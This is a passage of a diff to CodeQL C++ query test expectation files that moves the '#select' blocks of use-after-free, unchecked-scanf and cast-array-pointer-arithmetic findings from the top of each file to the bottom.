test_free.cpp:44:27:44:27 | pointer to free output argument | test_free.cpp:46:10:46:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:46:10:46:10 | a | a | test_free.cpp:44:22:44:25 | call to free | call to free | +| test_free.cpp:51:10:51:10 | a | test_free.cpp:50:27:50:27 | pointer to free output argument | test_free.cpp:51:10:51:10 | a | Memory pointed to by $@ may already have been freed by $@. 
| test_free.cpp:51:10:51:10 | a | a | test_free.cpp:50:22:50:25 | call to free | call to free | +| test_free.cpp:72:14:72:14 | a | test_free.cpp:69:10:69:10 | pointer to free output argument | test_free.cpp:72:14:72:14 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:72:14:72:14 | a | a | test_free.cpp:69:5:69:8 | call to free | call to free | +| test_free.cpp:85:12:85:12 | a | test_free.cpp:83:12:83:12 | pointer to operator delete output argument | test_free.cpp:85:12:85:12 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:85:12:85:12 | a | a | test_free.cpp:83:5:83:13 | delete | delete | +| test_free.cpp:103:10:103:10 | a | test_free.cpp:101:10:101:10 | pointer to free output argument | test_free.cpp:103:10:103:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:103:10:103:10 | a | a | test_free.cpp:101:5:101:8 | call to free | call to free | +| test_free.cpp:129:10:129:11 | * ... | test_free.cpp:128:10:128:11 | pointer to free output argument | test_free.cpp:129:10:129:11 | * ... | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:129:10:129:11 | * ... | * ... | test_free.cpp:128:5:128:8 | call to free | call to free | +| test_free.cpp:154:10:154:10 | a | test_free.cpp:152:27:152:27 | pointer to free output argument | test_free.cpp:154:10:154:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:154:10:154:10 | a | a | test_free.cpp:152:22:152:25 | call to free | call to free | +| test_free.cpp:209:10:209:10 | a | test_free.cpp:207:10:207:10 | pointer to free output argument | test_free.cpp:209:10:209:10 | a | Memory pointed to by $@ may already have been freed by $@. 
| test_free.cpp:209:10:209:10 | a | a | test_free.cpp:207:5:207:8 | call to free | call to free | +| test_free.cpp:302:12:302:14 | buf | test_free.cpp:301:12:301:14 | pointer to g_free output argument | test_free.cpp:302:12:302:14 | buf | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:302:12:302:14 | buf | buf | test_free.cpp:301:5:301:10 | call to g_free | call to g_free | +| test_free.cpp:322:12:322:12 | a | test_free.cpp:319:16:319:16 | pointer to operator delete output argument | test_free.cpp:322:12:322:12 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:322:12:322:12 | a | a | test_free.cpp:319:9:319:16 | delete | delete | diff --git a/cpp/ql/test/query-tests/Critical/MemoryFreed/UseAfterFree.expected b/cpp/ql/test/query-tests/Critical/MemoryFreed/UseAfterFree.expected index 153350b2a99c..891141f56f1e 100644 --- a/cpp/ql/test/query-tests/Critical/MemoryFreed/UseAfterFree.expected +++ b/cpp/ql/test/query-tests/Critical/MemoryFreed/UseAfterFree.expected 
@@ -1,28 +1,3 @@ -#select -| test.cpp:214:2:214:2 | a | test.cpp:213:7:213:7 | pointer to free output argument | test.cpp:214:2:214:2 | a | Memory may have been previously freed by $@. | test.cpp:213:2:213:5 | call to free | call to free | -| test.cpp:220:2:220:2 | a | test.cpp:219:7:219:7 | pointer to free output argument | test.cpp:220:2:220:2 | a | Memory may have been previously freed by $@. | test.cpp:219:2:219:5 | call to free | call to free | -| test.cpp:229:4:229:8 | data1 | test.cpp:228:14:228:18 | pointer to operator delete[] output argument | test.cpp:229:4:229:8 | data1 | Memory may have been previously freed by $@. | test.cpp:228:2:228:18 | delete[] | delete[] | -| test_free.cpp:12:5:12:5 | a | test_free.cpp:11:10:11:10 | pointer to free output argument | test_free.cpp:12:5:12:5 | a | Memory may have been previously freed by $@. | test_free.cpp:11:5:11:8 | call to free | call to free | -| test_free.cpp:13:5:13:6 | * ... | test_free.cpp:11:10:11:10 | pointer to free output argument | test_free.cpp:13:5:13:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:11:5:11:8 | call to free | call to free | -| test_free.cpp:45:5:45:5 | a | test_free.cpp:42:27:42:27 | pointer to free output argument | test_free.cpp:45:5:45:5 | a | Memory may have been previously freed by $@. | test_free.cpp:42:22:42:25 | call to free | call to free | -| test_free.cpp:45:5:45:5 | a | test_free.cpp:44:27:44:27 | pointer to free output argument | test_free.cpp:45:5:45:5 | a | Memory may have been previously freed by $@. | test_free.cpp:44:22:44:25 | call to free | call to free | -| test_free.cpp:71:9:71:9 | a | test_free.cpp:69:10:69:10 | pointer to free output argument | test_free.cpp:71:9:71:9 | a | Memory may have been previously freed by $@. 
| test_free.cpp:69:5:69:8 | call to free | call to free | -| test_free.cpp:84:5:84:5 | a | test_free.cpp:83:12:83:12 | pointer to operator delete output argument | test_free.cpp:84:5:84:5 | a | Memory may have been previously freed by $@. | test_free.cpp:83:5:83:13 | delete | delete | -| test_free.cpp:91:5:91:5 | a | test_free.cpp:90:10:90:10 | pointer to free output argument | test_free.cpp:91:5:91:5 | a | Memory may have been previously freed by $@. | test_free.cpp:90:5:90:8 | call to free | call to free | -| test_free.cpp:96:9:96:9 | a | test_free.cpp:95:10:95:10 | pointer to free output argument | test_free.cpp:96:9:96:9 | a | Memory may have been previously freed by $@. | test_free.cpp:95:5:95:8 | call to free | call to free | -| test_free.cpp:102:23:102:23 | a | test_free.cpp:101:10:101:10 | pointer to free output argument | test_free.cpp:102:23:102:23 | a | Memory may have been previously freed by $@. | test_free.cpp:101:5:101:8 | call to free | call to free | -| test_free.cpp:153:5:153:5 | a | test_free.cpp:152:27:152:27 | pointer to free output argument | test_free.cpp:153:5:153:5 | a | Memory may have been previously freed by $@. | test_free.cpp:152:22:152:25 | call to free | call to free | -| test_free.cpp:236:9:236:10 | * ... | test_free.cpp:233:14:233:15 | pointer to free output argument | test_free.cpp:236:9:236:10 | * ... | Memory may have been previously freed by $@. | test_free.cpp:233:9:233:12 | call to free | call to free | -| test_free.cpp:241:9:241:10 | * ... | test_free.cpp:239:14:239:15 | pointer to free output argument | test_free.cpp:241:9:241:10 | * ... | Memory may have been previously freed by $@. | test_free.cpp:239:9:239:12 | call to free | call to free | -| test_free.cpp:246:9:246:10 | * ... | test_free.cpp:245:10:245:11 | pointer to free output argument | test_free.cpp:246:9:246:10 | * ... | Memory may have been previously freed by $@. 
| test_free.cpp:245:5:245:8 | call to free | call to free | -| test_free.cpp:278:15:278:17 | buf | test_free.cpp:277:8:277:13 | pointer to free output argument | test_free.cpp:278:15:278:17 | buf | Memory may have been previously freed by $@. | test_free.cpp:277:3:277:6 | call to free | call to free | -| test_free.cpp:283:14:283:16 | buf | test_free.cpp:282:8:282:12 | pointer to free output argument | test_free.cpp:283:14:283:16 | buf | Memory may have been previously freed by $@. | test_free.cpp:282:3:282:6 | call to free | call to free | -| test_free.cpp:295:14:295:16 | buf | test_free.cpp:293:8:293:10 | pointer to free output argument | test_free.cpp:295:14:295:16 | buf | Memory may have been previously freed by $@. | test_free.cpp:293:3:293:6 | call to free | call to free | -| test_free.cpp:321:5:321:6 | * ... | test_free.cpp:319:16:319:16 | pointer to operator delete output argument | test_free.cpp:321:5:321:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:319:9:319:16 | delete | delete | -| test_free.cpp:324:5:324:6 | * ... | test_free.cpp:313:16:313:16 | pointer to operator delete output argument | test_free.cpp:324:5:324:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:313:9:313:16 | delete | delete | -| test_free.cpp:324:5:324:6 | * ... | test_free.cpp:319:16:319:16 | pointer to operator delete output argument | test_free.cpp:324:5:324:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:319:9:319:16 | delete | delete | -| test_free.cpp:324:5:324:6 | * ... | test_free.cpp:322:12:322:12 | pointer to operator delete output argument | test_free.cpp:324:5:324:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:322:5:322:12 | delete | delete | -| test_free.cpp:332:5:332:6 | * ... | test_free.cpp:331:12:331:12 | pointer to operator delete output argument | test_free.cpp:332:5:332:6 | * ... | Memory may have been previously freed by $@. 
| test_free.cpp:331:5:331:12 | delete | delete | edges | test.cpp:213:7:213:7 | pointer to free output argument | test.cpp:214:2:214:2 | a | provenance | | | test.cpp:219:7:219:7 | pointer to free output argument | test.cpp:220:2:220:2 | a | provenance | | 
@@ -118,3 +93,28 @@ nodes | test_free.cpp:331:12:331:12 | pointer to operator delete output argument | semmle.label | pointer to operator delete output argument | | test_free.cpp:332:5:332:6 | * ... | semmle.label | * ... | subpaths +#select +| test.cpp:214:2:214:2 | a | test.cpp:213:7:213:7 | pointer to free output argument | test.cpp:214:2:214:2 | a | Memory may have been previously freed by $@. | test.cpp:213:2:213:5 | call to free | call to free | +| test.cpp:220:2:220:2 | a | test.cpp:219:7:219:7 | pointer to free output argument | test.cpp:220:2:220:2 | a | Memory may have been previously freed by $@. | test.cpp:219:2:219:5 | call to free | call to free | +| test.cpp:229:4:229:8 | data1 | test.cpp:228:14:228:18 | pointer to operator delete[] output argument | test.cpp:229:4:229:8 | data1 | Memory may have been previously freed by $@. | test.cpp:228:2:228:18 | delete[] | delete[] | +| test_free.cpp:12:5:12:5 | a | test_free.cpp:11:10:11:10 | pointer to free output argument | test_free.cpp:12:5:12:5 | a | Memory may have been previously freed by $@. | test_free.cpp:11:5:11:8 | call to free | call to free | +| test_free.cpp:13:5:13:6 | * ... | test_free.cpp:11:10:11:10 | pointer to free output argument | test_free.cpp:13:5:13:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:11:5:11:8 | call to free | call to free | +| test_free.cpp:45:5:45:5 | a | test_free.cpp:42:27:42:27 | pointer to free output argument | test_free.cpp:45:5:45:5 | a | Memory may have been previously freed by $@. | test_free.cpp:42:22:42:25 | call to free | call to free | +| test_free.cpp:45:5:45:5 | a | test_free.cpp:44:27:44:27 | pointer to free output argument | test_free.cpp:45:5:45:5 | a | Memory may have been previously freed by $@. | test_free.cpp:44:22:44:25 | call to free | call to free | +| test_free.cpp:71:9:71:9 | a | test_free.cpp:69:10:69:10 | pointer to free output argument | test_free.cpp:71:9:71:9 | a | Memory may have been previously freed by $@. 
| test_free.cpp:69:5:69:8 | call to free | call to free | +| test_free.cpp:84:5:84:5 | a | test_free.cpp:83:12:83:12 | pointer to operator delete output argument | test_free.cpp:84:5:84:5 | a | Memory may have been previously freed by $@. | test_free.cpp:83:5:83:13 | delete | delete | +| test_free.cpp:91:5:91:5 | a | test_free.cpp:90:10:90:10 | pointer to free output argument | test_free.cpp:91:5:91:5 | a | Memory may have been previously freed by $@. | test_free.cpp:90:5:90:8 | call to free | call to free | +| test_free.cpp:96:9:96:9 | a | test_free.cpp:95:10:95:10 | pointer to free output argument | test_free.cpp:96:9:96:9 | a | Memory may have been previously freed by $@. | test_free.cpp:95:5:95:8 | call to free | call to free | +| test_free.cpp:102:23:102:23 | a | test_free.cpp:101:10:101:10 | pointer to free output argument | test_free.cpp:102:23:102:23 | a | Memory may have been previously freed by $@. | test_free.cpp:101:5:101:8 | call to free | call to free | +| test_free.cpp:153:5:153:5 | a | test_free.cpp:152:27:152:27 | pointer to free output argument | test_free.cpp:153:5:153:5 | a | Memory may have been previously freed by $@. | test_free.cpp:152:22:152:25 | call to free | call to free | +| test_free.cpp:236:9:236:10 | * ... | test_free.cpp:233:14:233:15 | pointer to free output argument | test_free.cpp:236:9:236:10 | * ... | Memory may have been previously freed by $@. | test_free.cpp:233:9:233:12 | call to free | call to free | +| test_free.cpp:241:9:241:10 | * ... | test_free.cpp:239:14:239:15 | pointer to free output argument | test_free.cpp:241:9:241:10 | * ... | Memory may have been previously freed by $@. | test_free.cpp:239:9:239:12 | call to free | call to free | +| test_free.cpp:246:9:246:10 | * ... | test_free.cpp:245:10:245:11 | pointer to free output argument | test_free.cpp:246:9:246:10 | * ... | Memory may have been previously freed by $@. 
| test_free.cpp:245:5:245:8 | call to free | call to free | +| test_free.cpp:278:15:278:17 | buf | test_free.cpp:277:8:277:13 | pointer to free output argument | test_free.cpp:278:15:278:17 | buf | Memory may have been previously freed by $@. | test_free.cpp:277:3:277:6 | call to free | call to free | +| test_free.cpp:283:14:283:16 | buf | test_free.cpp:282:8:282:12 | pointer to free output argument | test_free.cpp:283:14:283:16 | buf | Memory may have been previously freed by $@. | test_free.cpp:282:3:282:6 | call to free | call to free | +| test_free.cpp:295:14:295:16 | buf | test_free.cpp:293:8:293:10 | pointer to free output argument | test_free.cpp:295:14:295:16 | buf | Memory may have been previously freed by $@. | test_free.cpp:293:3:293:6 | call to free | call to free | +| test_free.cpp:321:5:321:6 | * ... | test_free.cpp:319:16:319:16 | pointer to operator delete output argument | test_free.cpp:321:5:321:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:319:9:319:16 | delete | delete | +| test_free.cpp:324:5:324:6 | * ... | test_free.cpp:313:16:313:16 | pointer to operator delete output argument | test_free.cpp:324:5:324:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:313:9:313:16 | delete | delete | +| test_free.cpp:324:5:324:6 | * ... | test_free.cpp:319:16:319:16 | pointer to operator delete output argument | test_free.cpp:324:5:324:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:319:9:319:16 | delete | delete | +| test_free.cpp:324:5:324:6 | * ... | test_free.cpp:322:12:322:12 | pointer to operator delete output argument | test_free.cpp:324:5:324:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:322:5:322:12 | delete | delete | +| test_free.cpp:332:5:332:6 | * ... | test_free.cpp:331:12:331:12 | pointer to operator delete output argument | test_free.cpp:332:5:332:6 | * ... | Memory may have been previously freed by $@. 
| test_free.cpp:331:5:331:12 | delete | delete | diff --git a/cpp/ql/test/query-tests/Critical/MissingCheckScanf/MissingCheckScanf.expected b/cpp/ql/test/query-tests/Critical/MissingCheckScanf/MissingCheckScanf.expected index e9c1038e5a4f..9b7564b9123d 100644 --- a/cpp/ql/test/query-tests/Critical/MissingCheckScanf/MissingCheckScanf.expected +++ b/cpp/ql/test/query-tests/Critical/MissingCheckScanf/MissingCheckScanf.expected 
@@ -1,25 +1,3 @@ -#select -| test.cpp:35:7:35:7 | i | test.cpp:34:15:34:16 | scanf output argument | test.cpp:35:7:35:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:34:3:34:7 | call to scanf | call to scanf | -| test.cpp:68:7:68:7 | i | test.cpp:67:15:67:16 | scanf output argument | test.cpp:68:7:68:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:67:3:67:7 | call to scanf | call to scanf | -| test.cpp:80:7:80:7 | i | test.cpp:79:15:79:16 | scanf output argument | test.cpp:80:7:80:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:79:3:79:7 | call to scanf | call to scanf | -| test.cpp:90:7:90:8 | * ... | test.cpp:89:15:89:15 | scanf output argument | test.cpp:90:7:90:8 | * ... | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:89:3:89:7 | call to scanf | call to scanf | -| test.cpp:98:7:98:8 | * ... | test.cpp:97:15:97:15 | scanf output argument | test.cpp:98:7:98:8 | * ... | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:97:3:97:7 | call to scanf | call to scanf | -| test.cpp:108:7:108:7 | i | test.cpp:107:32:107:33 | fscanf output argument | test.cpp:108:7:108:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:107:3:107:8 | call to fscanf | call to fscanf | -| test.cpp:115:7:115:7 | i | test.cpp:114:32:114:33 | sscanf output argument | test.cpp:115:7:115:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. 
| test.cpp:114:3:114:8 | call to sscanf | call to sscanf | -| test.cpp:224:8:224:8 | j | test.cpp:221:26:221:27 | scanf output argument | test.cpp:224:8:224:8 | j | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 2. | test.cpp:221:7:221:11 | call to scanf | call to scanf | -| test.cpp:248:9:248:9 | d | test.cpp:246:44:246:45 | scanf output argument | test.cpp:248:9:248:9 | d | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 2. | test.cpp:246:25:246:29 | call to scanf | call to scanf | -| test.cpp:252:9:252:9 | d | test.cpp:250:33:250:34 | scanf output argument | test.cpp:252:9:252:9 | d | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 2. | test.cpp:250:14:250:18 | call to scanf | call to scanf | -| test.cpp:272:7:272:7 | i | test.cpp:271:15:271:16 | scanf output argument | test.cpp:272:7:272:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:271:3:271:7 | call to scanf | call to scanf | -| test.cpp:280:7:280:7 | i | test.cpp:279:15:279:16 | scanf output argument | test.cpp:280:7:280:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:279:3:279:7 | call to scanf | call to scanf | -| test.cpp:292:7:292:7 | i | test.cpp:291:15:291:16 | scanf output argument | test.cpp:292:7:292:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:291:3:291:7 | call to scanf | call to scanf | -| test.cpp:404:25:404:25 | u | test.cpp:403:29:403:30 | sscanf output argument | test.cpp:404:18:404:25 | u | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. 
| test.cpp:403:6:403:11 | call to sscanf | call to sscanf | -| test.cpp:416:7:416:7 | i | test.cpp:413:19:413:20 | scanf output argument | test.cpp:416:7:416:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:413:7:413:11 | call to scanf | call to scanf | -| test.cpp:423:7:423:7 | i | test.cpp:420:19:420:20 | scanf output argument | test.cpp:423:7:423:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:420:7:420:11 | call to scanf | call to scanf | -| test.cpp:460:6:460:10 | value | test.cpp:455:41:455:46 | sscanf output argument | test.cpp:460:6:460:10 | value | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:455:12:455:17 | call to sscanf | call to sscanf | -| test.cpp:474:6:474:10 | value | test.cpp:467:20:467:25 | scanf output argument | test.cpp:474:6:474:10 | value | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:467:8:467:12 | call to scanf | call to scanf | -| test.cpp:484:9:484:9 | i | test.cpp:480:25:480:26 | scanf output argument | test.cpp:484:9:484:9 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:480:13:480:17 | call to scanf | call to scanf | -| test.cpp:495:8:495:8 | i | test.cpp:491:25:491:26 | scanf output argument | test.cpp:495:8:495:8 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:491:13:491:17 | call to scanf | call to scanf | -| test.cpp:545:8:545:8 | f | test.cpp:541:43:541:44 | sscanf output argument | test.cpp:545:8:545:8 | f | This variable is read, but may not have been written. 
It should be guarded by a check that the $@ returns at least 3. | test.cpp:541:10:541:15 | call to sscanf | call to sscanf | edges | test.c:10:31:10:32 | sscanf output argument | test.c:11:7:11:7 | x | provenance | | | test.cpp:34:15:34:16 | scanf output argument | test.cpp:35:7:35:7 | i | provenance | | 
@@ -186,3 +164,25 @@ nodes | test.cpp:575:30:575:31 | scanf output argument | semmle.label | scanf output argument | | test.cpp:577:9:577:9 | i | semmle.label | i | subpaths +#select +| test.cpp:35:7:35:7 | i | test.cpp:34:15:34:16 | scanf output argument | test.cpp:35:7:35:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:34:3:34:7 | call to scanf | call to scanf | +| test.cpp:68:7:68:7 | i | test.cpp:67:15:67:16 | scanf output argument | test.cpp:68:7:68:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:67:3:67:7 | call to scanf | call to scanf | +| test.cpp:80:7:80:7 | i | test.cpp:79:15:79:16 | scanf output argument | test.cpp:80:7:80:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:79:3:79:7 | call to scanf | call to scanf | +| test.cpp:90:7:90:8 | * ... | test.cpp:89:15:89:15 | scanf output argument | test.cpp:90:7:90:8 | * ... | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:89:3:89:7 | call to scanf | call to scanf | +| test.cpp:98:7:98:8 | * ... | test.cpp:97:15:97:15 | scanf output argument | test.cpp:98:7:98:8 | * ... | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:97:3:97:7 | call to scanf | call to scanf | +| test.cpp:108:7:108:7 | i | test.cpp:107:32:107:33 | fscanf output argument | test.cpp:108:7:108:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. 
| test.cpp:107:3:107:8 | call to fscanf | call to fscanf | +| test.cpp:115:7:115:7 | i | test.cpp:114:32:114:33 | sscanf output argument | test.cpp:115:7:115:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:114:3:114:8 | call to sscanf | call to sscanf | +| test.cpp:224:8:224:8 | j | test.cpp:221:26:221:27 | scanf output argument | test.cpp:224:8:224:8 | j | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 2. | test.cpp:221:7:221:11 | call to scanf | call to scanf | +| test.cpp:248:9:248:9 | d | test.cpp:246:44:246:45 | scanf output argument | test.cpp:248:9:248:9 | d | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 2. | test.cpp:246:25:246:29 | call to scanf | call to scanf | +| test.cpp:252:9:252:9 | d | test.cpp:250:33:250:34 | scanf output argument | test.cpp:252:9:252:9 | d | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 2. | test.cpp:250:14:250:18 | call to scanf | call to scanf | +| test.cpp:272:7:272:7 | i | test.cpp:271:15:271:16 | scanf output argument | test.cpp:272:7:272:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:271:3:271:7 | call to scanf | call to scanf | +| test.cpp:280:7:280:7 | i | test.cpp:279:15:279:16 | scanf output argument | test.cpp:280:7:280:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:279:3:279:7 | call to scanf | call to scanf | +| test.cpp:292:7:292:7 | i | test.cpp:291:15:291:16 | scanf output argument | test.cpp:292:7:292:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. 
| test.cpp:291:3:291:7 | call to scanf | call to scanf | +| test.cpp:404:25:404:25 | u | test.cpp:403:29:403:30 | sscanf output argument | test.cpp:404:18:404:25 | u | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:403:6:403:11 | call to sscanf | call to sscanf | +| test.cpp:416:7:416:7 | i | test.cpp:413:19:413:20 | scanf output argument | test.cpp:416:7:416:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:413:7:413:11 | call to scanf | call to scanf | +| test.cpp:423:7:423:7 | i | test.cpp:420:19:420:20 | scanf output argument | test.cpp:423:7:423:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:420:7:420:11 | call to scanf | call to scanf | +| test.cpp:460:6:460:10 | value | test.cpp:455:41:455:46 | sscanf output argument | test.cpp:460:6:460:10 | value | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:455:12:455:17 | call to sscanf | call to sscanf | +| test.cpp:474:6:474:10 | value | test.cpp:467:20:467:25 | scanf output argument | test.cpp:474:6:474:10 | value | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:467:8:467:12 | call to scanf | call to scanf | +| test.cpp:484:9:484:9 | i | test.cpp:480:25:480:26 | scanf output argument | test.cpp:484:9:484:9 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:480:13:480:17 | call to scanf | call to scanf | +| test.cpp:495:8:495:8 | i | test.cpp:491:25:491:26 | scanf output argument | test.cpp:495:8:495:8 | i | This variable is read, but may not have been written. 
It should be guarded by a check that the $@ returns at least 1. | test.cpp:491:13:491:17 | call to scanf | call to scanf | +| test.cpp:545:8:545:8 | f | test.cpp:541:43:541:44 | sscanf output argument | test.cpp:545:8:545:8 | f | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 3. | test.cpp:541:10:541:15 | call to sscanf | call to sscanf | diff --git a/cpp/ql/test/query-tests/Likely Bugs/Conversion/CastArrayPointerArithmetic/CastArrayPointerArithmetic.expected b/cpp/ql/test/query-tests/Likely Bugs/Conversion/CastArrayPointerArithmetic/CastArrayPointerArithmetic.expected index 0b8acb7030d6..75e2e581664e 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Conversion/CastArrayPointerArithmetic/CastArrayPointerArithmetic.expected +++ b/cpp/ql/test/query-tests/Likely Bugs/Conversion/CastArrayPointerArithmetic/CastArrayPointerArithmetic.expected 
@@ -1,13 +1,3 @@ -#select -| test.cpp:27:2:27:2 | b | test.cpp:57:19:57:19 | d | test.cpp:27:2:27:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:57:19:57:19 | d | this cast | -| test.cpp:27:2:27:2 | b | test.cpp:74:19:74:21 | dss | test.cpp:27:2:27:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:74:19:74:21 | dss | this cast | -| test.cpp:27:2:27:2 | b | test.cpp:86:19:86:20 | d2 | test.cpp:27:2:27:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:86:19:86:20 | d2 | this cast | -| test.cpp:31:2:31:2 | b | test.cpp:58:25:58:25 | d | test.cpp:31:2:31:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:58:25:58:25 | d | this cast | -| test.cpp:31:2:31:2 | b | test.cpp:75:25:75:27 | dss | test.cpp:31:2:31:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:75:25:75:27 | dss | this cast | -| test.cpp:31:2:31:2 | b | test.cpp:87:25:87:26 | d2 | test.cpp:31:2:31:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:87:25:87:26 | d2 | this cast | -| test.cpp:35:2:35:2 | b | test.cpp:59:21:59:21 | d | test.cpp:35:2:35:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:59:21:59:21 | d | this cast | -| test.cpp:35:2:35:2 | b | test.cpp:76:21:76:23 | dss | test.cpp:35:2:35:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:76:21:76:23 | dss | this cast | -| test.cpp:35:2:35:2 | b | test.cpp:88:21:88:22 | d2 | test.cpp:35:2:35:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:88:21:88:22 | d2 | this cast | edges | test.cpp:26:29:26:29 | b | test.cpp:27:2:27:2 | b | provenance | | | test.cpp:30:34:30:34 | b | test.cpp:31:2:31:2 | b | provenance | | 
@@ -38,3 +28,13 @@ nodes | test.cpp:87:25:87:26 | d2 | semmle.label | d2 | | test.cpp:88:21:88:22 | d2 | semmle.label | d2 | subpaths +#select +| test.cpp:27:2:27:2 | b | test.cpp:57:19:57:19 | d | test.cpp:27:2:27:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:57:19:57:19 | d | this cast | +| test.cpp:27:2:27:2 | b | test.cpp:74:19:74:21 | dss | test.cpp:27:2:27:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:74:19:74:21 | dss | this cast | +| test.cpp:27:2:27:2 | b | test.cpp:86:19:86:20 | d2 | test.cpp:27:2:27:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:86:19:86:20 | d2 | this cast | +| test.cpp:31:2:31:2 | b | test.cpp:58:25:58:25 | d | test.cpp:31:2:31:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:58:25:58:25 | d | this cast | +| test.cpp:31:2:31:2 | b | test.cpp:75:25:75:27 | dss | test.cpp:31:2:31:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:75:25:75:27 | dss | this cast | +| test.cpp:31:2:31:2 | b | test.cpp:87:25:87:26 | d2 | test.cpp:31:2:31:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:87:25:87:26 | d2 | this cast | +| test.cpp:35:2:35:2 | b | test.cpp:59:21:59:21 | d | test.cpp:35:2:35:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:59:21:59:21 | d | this cast | +| test.cpp:35:2:35:2 | b | test.cpp:76:21:76:23 | dss | test.cpp:35:2:35:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:76:21:76:23 | dss | this cast | +| test.cpp:35:2:35:2 | b | test.cpp:88:21:88:22 | d2 | test.cpp:35:2:35:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:88:21:88:22 | d2 | this cast | 
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/NonConstantFormat.expected b/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/NonConstantFormat.expected index 20ac0f055a1b..63851030bba5 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/NonConstantFormat.expected +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/NonConstantFormat.expected 
